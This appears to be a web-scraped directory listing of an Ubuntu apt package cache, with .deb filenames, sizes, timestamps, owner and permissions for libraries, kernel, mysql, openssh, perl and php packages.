libpcre2-8-0_10.39-3ubuntu0.1_amd64.deb
215.344 KB
September 22 2022 4:08:55
root
0644
libpcre2-8-0_10.42-3+ubuntu22.04.1+deb.sury.org+1_amd64.deb
224.906 KB
January 21 2024 7:27:05
root
0644
libpcre2-8-0_10.42-4ubuntu2.1_amd64.deb
221.35 KB
October 15 2024 8:02:25
root
0644
libpcre2-dev_10.42-4ubuntu2.1_amd64.deb
719.057 KB
October 15 2024 8:02:25
root
0644
libpcre2-posix3_10.42-4ubuntu2.1_amd64.deb
6.59 KB
October 15 2024 8:02:25
root
0644
libpcre3_2%3a8.39-13ubuntu0.22.04.1_amd64.deb
239.775 KB
May 17 2022 10:03:55
root
0644
libpcre3_2%3a8.45-1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
251.283 KB
June 20 2023 3:08:23
root
0644
libperl5.34_5.34.0-3ubuntu1.3_amd64.deb
4.6 MB
November 27 2023 10:04:54
root
0644
libperl5.34_5.34.0-3ubuntu1.5_amd64.deb
4.57 MB
July 29 2025 10:27:27
root
0644
libperl5.38t64_5.38.2-3.2ubuntu0.2_amd64.deb
4.65 MB
July 29 2025 10:45:25
root
0644
libpipeline1_1.5.7-2_amd64.deb
23.033 KB
March 31 2024 8:36:48
root
0644
libpkgconf3_1.8.1-2build1_amd64.deb
29.934 KB
April 09 2024 1:02:40
root
0644
libplymouth5_24.004.60-1ubuntu7.1_amd64.deb
133.988 KB
March 07 2025 7:49:46
root
0644
libpng16-16t64_1.6.43-5ubuntu0.1_amd64.deb
182.887 KB
December 11 2025 2:26:41
root
0644
libpolkit-agent-1-0_124-2ubuntu1.24.04.2_amd64.deb
17.037 KB
December 03 2024 6:34:45
root
0644
libpolkit-gobject-1-0_124-2ubuntu1.24.04.2_amd64.deb
47.971 KB
December 03 2024 6:34:45
root
0644
libpopt0_1.19+dfsg-1build1_amd64.deb
27.893 KB
April 09 2024 1:02:40
root
0644
libproc2-0_2%3a4.0.4-4ubuntu3.2_amd64.deb
58.061 KB
September 28 2024 5:09:53
root
0644
libprocps8_2%3a3.3.17-6ubuntu2.1_amd64.deb
35.313 KB
November 14 2023 5:04:23
root
0644
libprotobuf-lite23_3.12.4-1ubuntu7.22.04.4_amd64.deb
204.088 KB
July 09 2025 8:17:20
root
0644
libprotobuf-lite32t64_3.21.12-8.2ubuntu0.2_amd64.deb
232.803 KB
July 09 2025 8:17:34
root
0644
libpsl5t64_0.21.2-1.1build1_amd64.deb
55.734 KB
March 31 2024 4:11:29
root
0644
libpython3-stdlib_3.10.6-1~22.04.1_amd64.deb
6.652 KB
August 09 2024 5:02:00
root
0644
libpython3-stdlib_3.12.3-0ubuntu2.1_amd64.deb
9.844 KB
November 13 2025 12:32:02
root
0644
libpython3.10-minimal_3.10.12-1~22.04.11_amd64.deb
795.988 KB
August 22 2025 3:46:02
root
0644
libpython3.10-minimal_3.10.12-1~22.04.5_amd64.deb
793.818 KB
July 30 2024 9:56:31
root
0644
libpython3.10-stdlib_3.10.12-1~22.04.11_amd64.deb
1.76 MB
August 22 2025 3:46:01
root
0644
libpython3.10-stdlib_3.10.12-1~22.04.5_amd64.deb
1.76 MB
July 30 2024 9:56:30
root
0644
libpython3.10_3.10.12-1~22.04.11_amd64.deb
1.86 MB
August 22 2025 3:46:01
root
0644
libpython3.10_3.10.12-1~22.04.5_amd64.deb
1.86 MB
July 30 2024 9:56:30
root
0644
libpython3.12-minimal_3.12.3-1ubuntu0.9_amd64.deb
816.398 KB
November 25 2025 12:29:11
root
0644
libpython3.12-stdlib_3.12.3-1ubuntu0.9_amd64.deb
1.97 MB
November 25 2025 12:29:11
root
0644
libpython3.12t64_3.12.3-1ubuntu0.9_amd64.deb
2.23 MB
November 25 2025 12:29:09
root
0644
libquadmath0_12.3.0-1ubuntu1~22.04.2_amd64.deb
150.385 KB
August 19 2025 9:01:31
root
0644
libquadmath0_14.2.0-4ubuntu2~24.04_amd64.deb
149.746 KB
September 27 2024 6:19:46
root
0644
librav1e0_0.7.1-2_amd64.deb
997.752 KB
February 18 2024 2:14:48
root
0644
libraw23t64_0.21.2-2.1ubuntu0.24.04.1_amd64.deb
369.41 KB
May 06 2025 2:27:49
root
0644
libreadline8t64_8.2-4build1_amd64.deb
149.273 KB
March 31 2024 5:08:30
root
0644
librtmp1_2.4+20151223.gitfa8646d.1-2build7_amd64.deb
55.021 KB
March 31 2024 5:08:31
root
0644
libsasl2-2_2.1.27+dfsg2-3ubuntu1.2_amd64.deb
52.57 KB
February 01 2023 10:09:31
root
0644
libsasl2-2_2.1.28+dfsg1-5ubuntu3.1_amd64.deb
51.947 KB
August 09 2024 5:37:31
root
0644
libsasl2-modules-db_2.1.27+dfsg2-3ubuntu1.2_amd64.deb
19.996 KB
February 01 2023 10:09:31
root
0644
libsasl2-modules-db_2.1.28+dfsg1-5ubuntu3.1_amd64.deb
19.877 KB
August 09 2024 5:37:31
root
0644
libsasl2-modules_2.1.27+dfsg2-3ubuntu1.2_amd64.deb
67.191 KB
February 01 2023 10:09:32
root
0644
libsasl2-modules_2.1.28+dfsg1-5ubuntu3.1_amd64.deb
68.277 KB
August 09 2024 5:37:31
root
0644
libseccomp2_2.5.5-1ubuntu3.1_amd64.deb
49.242 KB
August 09 2024 6:49:16
root
0644
libselinux1_3.5-2ubuntu2.1_amd64.deb
77.793 KB
October 15 2024 6:47:24
root
0644
libsemanage-common_3.5-1build5_all.deb
9.906 KB
April 01 2024 10:51:52
root
0644
libsemanage2_3.5-1build5_amd64.deb
90.994 KB
April 01 2024 10:51:52
root
0644
libsensors-config_1%3a3.6.0-9build1_all.deb
5.416 KB
March 31 2024 11:26:34
root
0644
libsensors5_1%3a3.6.0-9build1_amd64.deb
25.977 KB
March 31 2024 11:26:34
root
0644
libsepol2_3.5-2build1_amd64.deb
295.85 KB
April 09 2024 1:03:02
root
0644
libsframe1_2.42-4ubuntu2.8_amd64.deb
15.225 KB
December 11 2025 12:31:40
root
0644
libsharpyuv0_1.3.2-0.4build3_amd64.deb
15.416 KB
March 31 2024 5:08:46
root
0644
libsigsegv2_2.14-1ubuntu2_amd64.deb
14.689 KB
April 09 2024 1:03:02
root
0644
libslang2_2.3.3-3build2_amd64.deb
494.123 KB
April 01 2024 10:51:42
root
0644
libsm6_2%3a1.2.3-1build3_amd64.deb
15.316 KB
April 09 2024 1:03:01
root
0644
libsmartcols1_2.37.2-4ubuntu3.4_amd64.deb
49.68 KB
April 10 2024 8:25:02
root
0644
libsmartcols1_2.39.3-9ubuntu6.3_amd64.deb
63.867 KB
June 26 2025 6:40:15
root
0644
libsodium23_1.0.18-1build3_amd64.deb
157.713 KB
April 09 2024 1:03:00
root
0644
libsqlite3-0_3.37.2-2ubuntu0.3_amd64.deb
626.256 KB
January 04 2024 2:05:50
root
0644
libsqlite3-0_3.37.2-2ubuntu0.5_amd64.deb
628.088 KB
July 28 2025 10:03:39
root
0644
libsqlite3-0_3.45.1-1ubuntu2.5_amd64.deb
684.703 KB
September 15 2025 11:47:16
root
0644
libss2_1.46.5-2ubuntu1.2_amd64.deb
12.047 KB
July 31 2024 5:14:20
root
0644
libss2_1.47.0-2.4~exp1ubuntu4.1_amd64.deb
16.578 KB
July 31 2024 5:15:45
root
0644
libssh-4_0.10.6-2ubuntu0.2_amd64.deb
184.066 KB
October 30 2025 10:33:31
root
0644
libssh-4_0.9.6-2ubuntu0.22.04.3_amd64.deb
181.752 KB
January 22 2024 9:35:10
root
0644
libssh-4_0.9.6-2ubuntu0.22.04.4_amd64.deb
182.133 KB
July 07 2025 9:38:08
root
0644
libssl-dev_3.0.13-0ubuntu3.6_amd64.deb
2.3 MB
September 30 2025 11:39:46
root
0644
libssl3_3.0.2-0ubuntu1.18_amd64.deb
1.82 MB
September 03 2024 10:51:26
root
0644
libssl3t64_3.0.13-0ubuntu3.6_amd64.deb
1.85 MB
September 30 2025 11:39:46
root
0644
libstdc++-11-dev_11.4.0-1ubuntu1~22.04.2_amd64.deb
2 MB
August 19 2025 9:00:54
root
0644
libstdc++-11-dev_11.5.0-1ubuntu1~24.04_amd64.deb
2 MB
October 10 2024 12:53:09
root
0644
libstdc++-13-dev_13.3.0-6ubuntu2~24.04_amd64.deb
2.31 MB
September 28 2024 12:38:01
root
0644
libstdc++6_12.3.0-1ubuntu1~22.04.2_amd64.deb
682.236 KB
August 19 2025 9:01:32
root
0644
libstdc++6_12.3.0-1ubuntu1~22.04_amd64.deb
682.23 KB
June 29 2023 10:09:19
root
0644
libstdc++6_14.2.0-4ubuntu2~24.04_amd64.deb
772.727 KB
September 27 2024 6:19:47
root
0644
libstemmer0d_2.2.0-4build1_amd64.deb
156.998 KB
April 09 2024 3:24:15
root
0644
libsub-override-perl_0.10-1_all.deb
9.775 KB
December 08 2023 7:32:56
root
0644
libsvtav1enc1d1_1.7.0+dfsg-2build1_amd64.deb
2.31 MB
April 19 2024 4:58:32
root
0644
libsys-hostname-long-perl_1.5-3_all.deb
10.365 KB
December 05 2022 7:30:18
root
0644
libsystemd-shared_255.4-1ubuntu8.11_amd64.deb
1.98 MB
September 02 2025 6:56:26
root
0644
libsystemd0_249.11-0ubuntu3.12_amd64.deb
311.25 KB
January 06 2024 4:05:33
root
0644
libsystemd0_249.11-0ubuntu3.16_amd64.deb
309.797 KB
June 09 2025 10:51:00
root
0644
libsystemd0_255.4-1ubuntu8.11_amd64.deb
424.234 KB
September 02 2025 6:56:26
root
0644
libtasn1-6_4.19.0-3ubuntu0.24.04.1_amd64.deb
43.303 KB
February 21 2025 3:39:19
root
0644
libtext-charwidth-perl_0.04-11build3_amd64.deb
9.139 KB
March 31 2024 4:11:27
root
0644
libtext-iconv-perl_1.7-8build3_amd64.deb
13.162 KB
March 31 2024 4:11:27
root
0644
libtext-wrapi18n-perl_0.06-10_all.deb
7.514 KB
November 06 2022 11:21:04
root
0644
libtiff5_4.3.0-6ubuntu0.11_amd64.deb
180.861 KB
August 20 2025 10:59:38
root
0644
libtiff6_4.5.1+git230720-4ubuntu2.4_amd64.deb
194.785 KB
September 29 2025 10:39:46
root
0644
libtinfo6_6.3-2ubuntu0.1_amd64.deb
102.152 KB
May 23 2023 6:43:56
root
0644
libtinfo6_6.4+20240113-1ubuntu2_amd64.deb
105.268 KB
April 09 2024 1:02:44
root
0644
libtirpc-common_1.3.2-2ubuntu0.1_all.deb
7.584 KB
July 28 2022 11:38:23
root
0644
libtirpc-common_1.3.4+ds-1.1build1_all.deb
7.904 KB
March 31 2024 11:26:44
root
0644
libtirpc-dev_1.3.4+ds-1.1build1_amd64.deb
188.885 KB
March 31 2024 11:26:44
root
0644
libtirpc3_1.3.2-2ubuntu0.1_amd64.deb
80.359 KB
July 28 2022 11:38:23
root
0644
libtirpc3t64_1.3.4+ds-1.1build1_amd64.deb
80.623 KB
March 31 2024 11:26:44
root
0644
libtool_2.4.7-7build1_all.deb
162.504 KB
April 09 2024 1:02:42
root
0644
libtraceevent1-plugin_1%3a1.8.2-1ubuntu2.1_amd64.deb
19.406 KB
March 28 2025 10:33:40
root
0644
libtraceevent1_1%3a1.8.2-1ubuntu2.1_amd64.deb
53.961 KB
March 28 2025 10:33:40
root
0644
libtracefs1_1.8.0-1ubuntu1_amd64.deb
63.961 KB
April 18 2024 12:47:06
root
0644
libtsan0_11.4.0-1ubuntu1~22.04.2_amd64.deb
2.16 MB
August 19 2025 9:01:06
root
0644
libtsan0_11.5.0-1ubuntu1~24.04_amd64.deb
2.16 MB
October 10 2024 12:53:20
root
0644
libtsan2_14.2.0-4ubuntu2~24.04_amd64.deb
2.64 MB
September 27 2024 6:19:39
root
0644
libubsan1_12.3.0-1ubuntu1~22.04.2_amd64.deb
953.135 KB
August 19 2025 9:01:27
root
0644
libubsan1_14.2.0-4ubuntu2~24.04_amd64.deb
1.13 MB
September 27 2024 6:19:41
root
0644
libuchardet0_0.0.8-1build1_amd64.deb
73.576 KB
April 09 2024 3:24:18
root
0644
libudev1_249.11-0ubuntu3.16_amd64.deb
74.912 KB
June 09 2025 10:51:00
root
0644
libudev1_255.4-1ubuntu8.11_amd64.deb
172.219 KB
September 02 2025 6:56:26
root
0644
libunistring5_1.1-2build1.1_amd64.deb
523.002 KB
October 15 2024 6:47:24
root
0644
libunwind8_1.3.2-2build2.1_amd64.deb
53.24 KB
June 30 2023 5:19:02
root
0644
libunwind8_1.6.2-3build1.1_amd64.deb
53.959 KB
October 15 2024 6:47:23
root
0644
liburi-perl_5.27-1_all.deb
85.977 KB
February 15 2024 8:30:59
root
0644
libusb-1.0-0_2%3a1.0.25-1ubuntu2_amd64.deb
51.453 KB
May 18 2022 1:04:40
root
0644
libusb-1.0-0_2%3a1.0.27-1_amd64.deb
52.742 KB
February 02 2024 9:51:21
root
0644
libuuid1_2.37.2-4ubuntu3.4_amd64.deb
23.26 KB
April 10 2024 8:25:03
root
0644
libuuid1_2.39.3-9ubuntu6.3_amd64.deb
34.979 KB
June 26 2025 6:40:15
root
0644
libuv1_1.43.0-1ubuntu0.1_amd64.deb
90.535 KB
February 28 2024 9:22:43
root
0644
libuv1t64_1.48.0-1.1build1_amd64.deb
95.008 KB
March 31 2024 5:08:46
root
0644
libwebp7_1.3.2-0.4build3_amd64.deb
224.824 KB
March 31 2024 5:08:46
root
0644
libwebpdemux2_1.3.2-0.4build3_amd64.deb
12.098 KB
March 31 2024 5:08:46
root
0644
libwebpmux3_1.3.2-0.4build3_amd64.deb
25.072 KB
March 31 2024 5:08:46
root
0644
libwrap0_7.6.q-33_amd64.deb
46.752 KB
April 06 2024 2:08:25
root
0644
libx11-6_2%3a1.7.5-1ubuntu0.3_amd64.deb
651.314 KB
October 04 2023 1:13:35
root
0644
libx11-6_2%3a1.8.7-1build1_amd64.deb
634.551 KB
April 09 2024 1:02:54
root
0644
libx11-data_2%3a1.7.5-1ubuntu0.3_all.deb
116.959 KB
October 04 2023 1:13:34
root
0644
libx11-data_2%3a1.8.7-1build1_all.deb
112.74 KB
April 09 2024 1:02:54
root
0644
libx265-199_3.5-2build1_amd64.deb
1.17 MB
April 19 2024 4:58:28
root
0644
libxau6_1%3a1.0.9-1build6_amd64.deb
6.992 KB
April 09 2024 1:02:56
root
0644
libxcb1_1.15-1ubuntu2_amd64.deb
46.611 KB
April 19 2024 12:08:56
root
0644
libxdmcp6_1%3a1.1.3-0ubuntu6_amd64.deb
10.014 KB
April 09 2024 1:02:54
root
0644
libxext6_2%3a1.3.4-1build2_amd64.deb
29.693 KB
April 09 2024 1:02:52
root
0644
libxkbcommon0_1.6.0-1build1_amd64.deb
119.086 KB
April 09 2024 1:02:51
root
0644
libxml2_2.9.13+dfsg-1ubuntu0.4_amd64.deb
745.498 KB
February 26 2024 10:50:23
root
0644
libxml2_2.9.14+dfsg-0.1+ubuntu22.04.1+deb.sury.org+1_amd64.deb
819.783 KB
April 21 2023 11:48:45
root
0644
libxml2_2.9.14+dfsg-1.3ubuntu3.6_amd64.deb
744.934 KB
October 31 2025 3:03:46
root
0644
libxmlb2_0.3.18-1_amd64.deb
66.104 KB
April 12 2024 6:23:33
root
0644
libxmlrpc-epi0t64_0.54.2-2.1build1_amd64.deb
30.223 KB
April 01 2024 2:53:39
root
0644
libxmuu1_2%3a1.1.3-3build2_amd64.deb
8.748 KB
March 31 2024 11:26:40
root
0644
libxpm4_1%3a3.5.17-1build2_amd64.deb
35.607 KB
March 31 2024 5:08:47
root
0644
libxslt1.1_1.1.34-4ubuntu0.22.04.4_amd64.deb
160.842 KB
June 27 2025 12:16:22
root
0644
libxslt1.1_1.1.39-0exp1ubuntu0.24.04.2_amd64.deb
163.551 KB
March 20 2025 8:31:18
root
0644
libxt6t64_1%3a1.2.1-1.2build1_amd64.deb
166.807 KB
March 31 2024 11:26:38
root
0644
libxtables12_1.8.10-3ubuntu2_amd64.deb
34.867 KB
April 09 2024 1:03:21
root
0644
libxtables12_1.8.7-1ubuntu5.2_amd64.deb
30.566 KB
January 20 2024 10:05:01
root
0644
libxxhash0_0.8.2-2build1_amd64.deb
23.492 KB
April 09 2024 2:39:33
root
0644
libyaml-0-2_0.2.5-1build1_amd64.deb
50.285 KB
April 09 2024 1:02:50
root
0644
libyuv0_0.0~git202401110.af6ac82-1_amd64.deb
174.031 KB
January 17 2024 1:55:38
root
0644
libzip4t64_1.7.3-1.1ubuntu2_amd64.deb
52.34 KB
March 31 2024 5:08:46
root
0644
libzstd1_1.5.5+dfsg2-2build1.1_amd64.deb
292.453 KB
August 09 2024 6:49:12
root
0644
linux-base_4.5ubuntu9+24.04.1_all.deb
17.637 KB
March 07 2025 7:49:42
root
0644
linux-firmware_20220329.git681281e4-0ubuntu3.31_all.deb
254.38 MB
May 06 2024 11:23:54
root
0644
linux-firmware_20220329.git681281e4-0ubuntu3.39_all.deb
301.34 MB
August 23 2025 3:54:59
root
0644
linux-firmware_20240318.git3b128b60-0ubuntu2.21_amd64.deb
514.29 MB
November 17 2025 10:55:37
root
0644
linux-generic_5.15.0.153.153_amd64.deb
1.615 KB
August 27 2025 7:58:37
root
0644
linux-generic_6.8.0-90.91_amd64.deb
1.658 KB
December 11 2025 9:44:12
root
0644
linux-headers-5.15.0-153-generic_5.15.0-153.163_amd64.deb
2.72 MB
August 27 2025 7:58:23
root
0644
linux-headers-5.15.0-153_5.15.0-153.163_all.deb
11.77 MB
August 27 2025 7:58:26
root
0644
linux-headers-6.8.0-90-generic_6.8.0-90.91_amd64.deb
3.97 MB
December 11 2025 9:43:39
root
0644
linux-headers-6.8.0-90_6.8.0-90.91_all.deb
13.33 MB
December 11 2025 9:43:36
root
0644
linux-headers-generic_5.15.0.153.153_amd64.deb
2.264 KB
August 27 2025 7:58:37
root
0644
linux-headers-generic_6.8.0-90.91_amd64.deb
10.672 KB
December 11 2025 9:44:13
root
0644
linux-image-5.15.0-153-generic_5.15.0-153.163_amd64.deb
11.02 MB
August 27 2025 7:58:31
root
0644
linux-image-6.8.0-90-generic_6.8.0-90.91_amd64.deb
14.08 MB
December 11 2025 9:44:13
root
0644
linux-image-generic_5.15.0.153.153_amd64.deb
2.404 KB
August 27 2025 7:58:37
root
0644
linux-image-generic_6.8.0-90.91_amd64.deb
10.84 KB
December 11 2025 9:44:13
root
0644
linux-libc-dev_5.15.0-153.163_amd64.deb
1.26 MB
August 27 2025 7:58:28
root
0644
linux-libc-dev_6.8.0-90.91_amd64.deb
1.84 MB
December 11 2025 9:43:47
root
0644
linux-modules-5.15.0-153-generic_5.15.0-153.163_amd64.deb
21.63 MB
August 27 2025 7:58:26
root
0644
linux-modules-6.8.0-90-generic_6.8.0-90.91_amd64.deb
37.61 MB
December 11 2025 9:43:41
root
0644
linux-modules-extra-5.15.0-153-generic_5.15.0-153.163_amd64.deb
60.95 MB
August 27 2025 7:58:25
root
0644
linux-modules-extra-6.8.0-90-generic_6.8.0-90.91_amd64.deb
107.94 MB
December 11 2025 9:43:38
root
0644
linux-tools-6.8.0-90-generic_6.8.0-90.91_amd64.deb
1.77 KB
December 11 2025 9:43:40
root
0644
linux-tools-6.8.0-90_6.8.0-90.91_amd64.deb
5.18 MB
December 11 2025 9:43:39
root
0644
linux-tools-common_6.8.0-90.91_all.deb
755.516 KB
December 11 2025 9:43:46
root
0644
locales_2.35-0ubuntu3.10_all.deb
4.05 MB
May 28 2025 5:57:38
root
0644
locales_2.35-0ubuntu3.8_all.deb
4.05 MB
May 30 2024 12:10:47
root
0644
locales_2.39-0ubuntu8.6_all.deb
4.03 MB
September 22 2025 11:03:05
root
0644
lock
0 KB
September 06 2024 2:18:55
root
0640
login_1%3a4.13+dfsg1-4ubuntu3.2_amd64.deb
196.953 KB
June 14 2024 10:09:56
root
0644
login_1%3a4.8.1-2ubuntu2.2_amd64.deb
183.322 KB
February 16 2024 2:15:57
root
0644
logrotate_3.19.0-1ubuntu1.1_amd64.deb
52.99 KB
May 26 2022 7:47:23
root
0644
logrotate_3.21.0-2build1_amd64.deb
50.988 KB
April 09 2024 1:02:49
root
0644
logsave_1.46.5-2ubuntu1.2_amd64.deb
9.848 KB
July 31 2024 5:14:20
root
0644
logsave_1.47.0-2.4~exp1ubuntu4.1_amd64.deb
22.168 KB
July 31 2024 5:15:45
root
0644
lsb-base_11.6_all.deb
4.498 KB
February 06 2023 7:24:59
root
0644
lsb-release_12.0-2_all.deb
6.41 KB
July 27 2023 1:44:55
root
0644
lshw_02.19.git.2021.06.19.996aaad9c7-2build3_amd64.deb
326.029 KB
April 01 2024 2:38:32
root
0644
lsof_4.95.0-1build3_amd64.deb
240.953 KB
April 01 2024 1:46:02
root
0644
lto-disabled-list_47_all.deb
12.109 KB
February 21 2024 11:12:51
root
0644
ltrace_0.7.3-6.1ubuntu6.22.04.1_amd64.deb
129.441 KB
January 20 2024 7:50:50
root
0644
ltrace_0.7.3-6.4ubuntu3_amd64.deb
131.047 KB
April 01 2024 6:34:07
root
0644
lua-bitop_1.0.2-7_amd64.deb
8.088 KB
January 28 2023 1:40:06
root
0644
lua-cjson_2.1.0+dfsg-2.2_amd64.deb
20.557 KB
December 07 2022 8:03:20
root
0644
m4_1.4.19-4build1_amd64.deb
237.93 KB
April 09 2024 1:02:46
root
0644
make_4.3-4.1build2_amd64.deb
175.539 KB
April 09 2024 1:02:47
root
0644
man-db_2.12.0-4build2_amd64.deb
1.18 MB
April 08 2024 11:20:52
root
0644
manpages-dev_6.7-2_all.deb
1.92 MB
April 03 2024 8:10:15
root
0644
manpages_6.7-2_all.deb
1.32 MB
April 03 2024 8:10:15
root
0644
mawk_1.3.4.20240123-1build1_amd64.deb
124.24 KB
April 09 2024 1:02:47
root
0644
mecab-utils_0.996-14ubuntu4_amd64.deb
4.691 KB
April 01 2024 10:51:48
root
0644
media-types_10.1.0_all.deb
26.83 KB
July 14 2023 8:24:24
root
0644
mlock_8%3a2007f~dfsg-7build3_amd64.deb
7.922 KB
April 01 2024 4:03:47
root
0644
mount_2.37.2-4ubuntu3.4_amd64.deb
111.404 KB
April 10 2024 8:25:03
root
0644
mount_2.39.3-9ubuntu6.3_amd64.deb
115.482 KB
June 26 2025 6:40:15
root
0644
mtr-tiny_0.95-1.1ubuntu0.1_amd64.deb
53.033 KB
October 25 2024 4:26:37
root
0644
mysql-client-8.0_8.0.43-0ubuntu0.22.04.1_amd64.deb
22.131 KB
August 13 2025 8:31:51
root
0644
mysql-client-8.0_8.0.44-0ubuntu0.24.04.1_amd64.deb
21.926 KB
November 19 2025 10:05:01
root
0644
mysql-client-core-8.0_8.0.43-0ubuntu0.22.04.1_amd64.deb
2.58 MB
August 13 2025 8:31:51
root
0644
mysql-client-core-8.0_8.0.44-0ubuntu0.24.04.1_amd64.deb
2.61 MB
November 19 2025 10:05:01
root
0644
mysql-common_5.8+1.1.0build1_all.deb
6.588 KB
April 09 2024 1:02:46
root
0644
mysql-server-8.0_8.0.43-0ubuntu0.22.04.1_amd64.deb
1.38 MB
August 13 2025 8:31:51
root
0644
mysql-server-8.0_8.0.44-0ubuntu0.24.04.1_amd64.deb
1.37 MB
November 19 2025 10:05:01
root
0644
mysql-server-core-8.0_8.0.43-0ubuntu0.22.04.1_amd64.deb
16.96 MB
August 13 2025 8:31:50
root
0644
mysql-server-core-8.0_8.0.44-0ubuntu0.24.04.1_amd64.deb
16.71 MB
November 19 2025 10:05:00
root
0644
mysql-server_8.0.43-0ubuntu0.22.04.1_all.deb
9.232 KB
August 13 2025 8:31:36
root
0644
mysql-server_8.0.44-0ubuntu0.24.04.1_all.deb
9.297 KB
November 19 2025 10:04:48
root
0644
nano_7.2-2ubuntu0.1_amd64.deb
275.174 KB
October 15 2024 9:15:43
root
0644
ncal_12.1.8_amd64.deb
20.5 KB
May 12 2023 12:39:19
root
0644
ncurses-base_6.3-2ubuntu0.1_all.deb
19.736 KB
May 23 2023 6:43:56
root
0644
ncurses-base_6.4+20240113-1ubuntu2_all.deb
24.918 KB
April 09 2024 1:02:44
root
0644
ncurses-bin_6.3-2ubuntu0.1_amd64.deb
179.998 KB
May 23 2023 6:43:56
root
0644
ncurses-bin_6.4+20240113-1ubuntu2_amd64.deb
183.967 KB
April 09 2024 1:02:44
root
0644
ncurses-term_6.3-2ubuntu0.1_all.deb
261.225 KB
May 23 2023 6:43:55
root
0644
ncurses-term_6.4+20240113-1ubuntu2_all.deb
268.393 KB
April 09 2024 1:02:44
root
0644
netbase_6.4_all.deb
12.805 KB
November 06 2022 11:20:37
root
0644
netcat-openbsd_1.226-1ubuntu2_amd64.deb
43.254 KB
April 09 2024 1:02:45
root
0644
netplan-generator_1.1.2-2~ubuntu24.04.2_amd64.deb
59.707 KB
July 02 2025 7:42:04
root
0644
netplan.io_0.106.1-7ubuntu0.22.04.4_amd64.deb
103.285 KB
June 29 2024 3:55:23
root
0644
netplan.io_1.1.2-2~ubuntu24.04.2_amd64.deb
68.059 KB
July 02 2025 7:42:04
root
0644
networkd-dispatcher_2.1-2ubuntu0.22.04.2_all.deb
15.465 KB
May 05 2022 1:39:40
root
0644
networkd-dispatcher_2.2.4-1_all.deb
15.141 KB
May 02 2023 9:29:43
root
0644
nftables_1.0.2-1ubuntu3_amd64.deb
65.67 KB
August 17 2022 10:54:09
root
0644
nftables_1.0.9-1build1_amd64.deb
68.197 KB
April 09 2024 1:02:45
root
0644
nodejs_20.19.5-1nodesource1_amd64.deb
30.48 MB
September 04 2025 3:58:43
root
0644
ntfs-3g_1%3a2021.8.22-3ubuntu1.2_amd64.deb
398.422 KB
November 02 2022 8:04:24
root
0644
ntfs-3g_1%3a2022.10.3-1.2ubuntu3_amd64.deb
396.803 KB
April 08 2024 11:20:50
root
0644
numactl_2.0.18-1build1_amd64.deb
38.217 KB
April 09 2024 1:02:45
root
0644
openssh-client_1%3a8.9p1-3ubuntu0.10_amd64.deb
884.346 KB
July 01 2024 5:15:46
root
0644
openssh-client_1%3a9.6p1-3ubuntu13.14_amd64.deb
884.373 KB
August 29 2025 10:11:19
root
0644
openssh-server_1%3a8.9p1-3ubuntu0.10_amd64.deb
424.66 KB
July 01 2024 5:15:46
root
0644
openssh-server_1%3a9.6p1-3ubuntu13.14_amd64.deb
497.945 KB
August 29 2025 10:11:19
root
0644
openssh-sftp-server_1%3a8.9p1-3ubuntu0.10_amd64.deb
37.941 KB
July 01 2024 5:15:45
root
0644
openssh-sftp-server_1%3a9.6p1-3ubuntu13.14_amd64.deb
36.473 KB
August 29 2025 10:11:19
root
0644
openssl_3.0.13-0ubuntu3.6_amd64.deb
979.217 KB
September 30 2025 11:39:46
root
0644
openssl_3.0.2-0ubuntu1.18_amd64.deb
1.13 MB
September 03 2024 10:51:26
root
0644
os-prober_1.81ubuntu4_amd64.deb
17.551 KB
April 09 2024 1:02:45
root
0644
packagekit-tools_1.2.8-2ubuntu1.4_amd64.deb
27.59 KB
October 17 2025 11:23:45
root
0644
packagekit_1.2.8-2ubuntu1.4_amd64.deb
423.568 KB
October 17 2025 11:23:47
root
0644
parted_3.6-4build1_amd64.deb
42.307 KB
April 01 2024 2:38:00
root
0644
passwd_1%3a4.13+dfsg1-4ubuntu3.2_amd64.deb
824.785 KB
June 14 2024 10:09:56
root
0644
passwd_1%3a4.8.1-2ubuntu2.2_amd64.deb
749.629 KB
February 16 2024 2:15:56
root
0644
patch_2.7.6-7build3_amd64.deb
101.609 KB
April 09 2024 1:02:43
root
0644
pci.ids_0.0~2024.03.31-1ubuntu0.1_all.deb
268.758 KB
March 07 2025 5:26:17
root
0644
pciutils_1%3a3.10.0-2build1_amd64.deb
68.078 KB
April 09 2024 1:02:41
root
0644
perl-base_5.34.0-3ubuntu1.3_amd64.deb
1.68 MB
November 27 2023 10:04:54
root
0644
perl-base_5.34.0-3ubuntu1.5_amd64.deb
1.68 MB
July 29 2025 10:27:29
root
0644
perl-base_5.38.2-3.2ubuntu0.2_amd64.deb
1.74 MB
July 29 2025 10:45:32
root
0644
perl-modules-5.34_5.34.0-3ubuntu1.3_all.deb
2.84 MB
November 27 2023 10:04:53
root
0644
perl-modules-5.34_5.34.0-3ubuntu1.5_all.deb
2.84 MB
July 29 2025 10:27:23
root
0644
perl-modules-5.38_5.38.2-3.2ubuntu0.2_all.deb
2.97 MB
July 29 2025 10:45:20
root
0644
perl_5.34.0-3ubuntu1.3_amd64.deb
226.234 KB
November 27 2023 10:04:54
root
0644
perl_5.34.0-3ubuntu1.5_amd64.deb
226.287 KB
July 29 2025 10:27:29
root
0644
perl_5.38.2-3.2ubuntu0.2_amd64.deb
225.971 KB
July 29 2025 10:45:33
root
0644
php-common_2%3a100~+ubuntu24.04.1+deb.sury.org+1_all.deb
13.533 KB
December 20 2025 2:23:13
root
0644
php-pear_1%3a1.10.16+submodules+notgz-2+ubuntu24.04.1+deb.sury.org+1_all.deb
286.857 KB
April 20 2025 4:17:26
root
0644
php7.4-cli_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
1.51 MB
July 04 2025 1:46:18
root
0644
php7.4-cli_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
1.5 MB
December 19 2025 8:16:53
root
0644
php7.4-common_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
679.473 KB
July 04 2025 1:46:18
root
0644
php7.4-common_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
671.709 KB
December 19 2025 8:16:52
root
0644
php7.4-curl_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
34.424 KB
July 04 2025 1:46:17
root
0644
php7.4-curl_1%3a7.4.33-24+ubuntu24.04.1+deb.sury.org+1_amd64.deb
33.031 KB
December 19 2025 8:16:52
root
0644
php7.4-dev_1%3a7.4.33-21+ubuntu22.04.1+deb.sury.org+1_amd64.deb
422.906 KB
July 04 2025 1:46:16
root
